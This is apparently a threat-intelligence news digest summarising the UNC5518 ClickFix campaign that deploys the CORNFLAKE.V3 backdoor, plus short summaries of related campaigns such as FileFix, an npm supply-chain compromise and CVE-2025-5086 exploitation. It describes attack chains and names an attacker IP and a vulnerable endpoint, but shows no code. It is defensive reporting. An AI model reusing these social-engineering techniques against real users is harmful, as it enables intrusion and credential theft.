UNC5518 Access-as-a-Service Scheme Deploys CORNFLAKE.V3 Backdoor
Summary
Hide β²
Show βΌ
UNC5518, a threat actor tracked by Mandiant, has been deploying the CORNFLAKE.V3 backdoor via the ClickFix social engineering tactic and fake CAPTCHA pages. This access-as-a-service scheme provides initial access to systems, which is then monetized by other threat groups, including UNC5774 and UNC4108. The backdoor supports multiple payload types and uses Cloudflare tunnels to evade detection. The attack chain begins with users interacting with compromised search results or malicious ads, leading them to fake CAPTCHA pages. Users are then tricked into executing a malicious PowerShell script, which downloads and executes CORNFLAKE.V3. The backdoor collects system information and can execute various payloads, including additional backdoors and credential-harvesting scripts. The CORNFLAKE.V3 backdoor is an updated version of CORNFLAKE.V2, featuring enhanced capabilities such as host persistence and support for additional payload types. The scheme has been observed since at least 2024, with multiple threat actors leveraging the initial access provided by UNC5518.
Timeline
-
21.08.2025 19:25 π° 1 articles Β· β± 26d ago
UNC5518 Deploys CORNFLAKE.V3 Backdoor via ClickFix Tactic
UNC5518 has been observed deploying the CORNFLAKE.V3 backdoor using the ClickFix social engineering tactic and fake CAPTCHA pages. The backdoor supports multiple payload types and uses Cloudflare tunnels to evade detection. The scheme provides initial access to systems, which is then monetized by other threat groups, including UNC5774 and UNC4108. The attack chain begins with users interacting with compromised search results or malicious ads, leading them to fake CAPTCHA pages. Users are then tricked into executing a malicious PowerShell script, which downloads and executes CORNFLAKE.V3. The backdoor collects system information and can execute various payloads, including additional backdoors and credential-harvesting scripts.
Show sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
Information Snippets
-
UNC5518 uses the ClickFix tactic to trick users into executing a malicious PowerShell script via the Windows Run dialog box.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
The initial infection vector involves fake CAPTCHA pages and compromised search results or malicious ads.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
CORNFLAKE.V3 supports the execution of various payload types, including executables, DLLs, JavaScript files, batch scripts, and PowerShell commands.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
The backdoor collects basic system information and transmits it to an external server via Cloudflare tunnels.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
CORNFLAKE.V3 achieves persistence on the host through Windows Registry changes.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
The backdoor delivers multiple payloads, including an Active Directory reconnaissance utility, a Kerberoasting script, and another backdoor named WINDYTWIST.SEA.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
UNC5774 and UNC4108 are among the threat groups leveraging the initial access provided by UNC5518.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
UNC5774 is financially motivated and delivers CORNFLAKE as a way to deploy various subsequent payloads.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
UNC4108 uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, featuring host persistence and support for additional payload types.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
-
The backdoor's progenitor was a C-based downloader that used TCP sockets for C2 communications and only supported DLL payloads.
First reported: 21.08.2025 19:25π° 1 source, 1 articleShow sources
- Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages β thehackernews.com β 21.08.2025 19:25
Similar Happenings
FileFix Attack Using Steganography to Deploy StealC Infostealer
A new FileFix social engineering campaign impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The attack uses steganography to hide malicious scripts and executables within a JPG image. The campaign targets various credentials, cryptocurrency wallets, and cloud services. The FileFix technique abuses the File Explorer address bar to execute PowerShell commands, bypassing traditional detection methods. The attack was discovered by Acronis and observed over a two-week period, with multiple variants using different payloads and domains. The StealC malware aims to steal sensitive information from infected devices, including browser credentials, messaging app data, and cryptocurrency wallets. The FileFix technique was created by red team researcher mr.d0x and has been previously used by the Interlock ransomware gang. The attack uses a multilingual phishing site to trick users into copying and pasting a malicious command into the File Explorer address bar. The campaign abuses Bitbucket repositories to host malicious components, leveraging trust in the platform to bypass detection. The FileFix campaign is the most widespread, customized, and sophisticated to date, targeting users in over 16 countries. The phishing site has been translated into at least 16 different languages. The attack chain involves a phishing email impersonating Facebook security, warning users of account suspension. The attack uses AI-generated images in the steganography process. The FileFix technique is more elegant and less suspicious than ClickFix, using File Explorer instead of the Run dialog. The FileFix attack offers a broader range of high-value targets due to its use of File Explorer. Security researcher Eliad Kimhy predicts an increase in FileFix attacks in the near future.
Supply Chain Attack Targeting npm Registry Compromises 40 Packages
A supply chain attack targeting the npm registry has compromised over 187 packages maintained by multiple developers. The attack uses a malicious script (bundle.js) to steal credentials from developer machines. The compromised packages include various npm modules used in different projects. The attack is capable of targeting both Windows and Linux systems. The malicious script scans for secrets using TruffleHog's credential scanner and transmits them to an external server controlled by the attackers. Developers are advised to audit their environments and rotate credentials if the affected packages are present.
UNC6040 and UNC6395 Target Salesforce Platforms in Data Theft Campaigns
The FBI has issued an alert about two cybercriminal groups, UNC6040 and UNC6395, targeting Salesforce platforms for data theft and extortion. UNC6395 exploited compromised OAuth tokens for the Salesloft Drift application, while UNC6040 used vishing campaigns and modified Salesforce tools to breach Salesforce instances. Both groups have been active since at least October 2024, impacting multiple organizations. UNC6040 has been linked to extortion activities, with Google attributing these to a separate cluster, UNC6240, which has claimed to be the ShinyHunters group. The ShinyHunters group, along with Scattered Spider and LAPSUS$, recently announced they are going dark, but experts warn that the threat persists. UNC6040 impersonated corporate IT support personnel to gain access to Salesforce environments and used modified versions of Salesforce's Data Loader to exfiltrate data. Salesforce re-enabled integrations with Salesloft technologies, except for the Drift app, which remains disabled.
Active exploitation of CVE-2025-5086 in DELMIA Apriso
CVE-2025-5086, a critical deserialization flaw in Dassault Systèmes DELMIA Apriso Manufacturing Operations Management (MOM) software, is being actively exploited. The vulnerability, with a CVSS score of 9.0, affects versions from Release 2020 through Release 2025. Exploitation attempts have been observed, targeting the /apriso/WebServices/FlexNetOperationsService.svc/Invoke endpoint with a Base64-encoded payload. The payload decodes to a GZIP-compressed Windows executable that deploys a malicious program designed to spy on user activities. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, advising Federal Civilian Executive Branch (FCEB) agencies to apply updates by October 2, 2025. The malware, identified as Trojan.MSIL.Zapchast.gen, captures keyboard input, takes screenshots, and gathers information about active applications. This information is then sent to the attacker via various means, including email, FTP, and HTTP. The exploit involves sending a malicious SOAP request to vulnerable endpoints. The malicious requests were observed originating from the IP 156.244.33[.]162.
Resurfaced ChillyHell macOS Backdoor Discovered
A new version of the ChillyHell modular backdoor malware targeting macOS has been discovered. The malware, first seen in 2022, was used in attacks against Ukrainian officials and has now resurfaced with updated capabilities. ChillyHell provides remote access, payload delivery, and password brute-forcing. The malware was notarized by Apple in 2021 and has been publicly hosted on Dropbox since then. The malware disguises itself as an executable applet and deploys as a persistent backdoor, capable of retrieving sensitive data and evading detection. It employs multiple persistence mechanisms and can communicate over different protocols. It also features timestamping to cover its tracks. Apple has revoked the notarization of the developer certificates associated with the malware after being notified. ChillyHell is written in C++ and targets Intel architectures. It is attributed to an uncategorized threat cluster dubbed UNC4487, which has been active since at least October 2022. UNC4487 is suspected to be an espionage actor targeting Ukrainian government entities.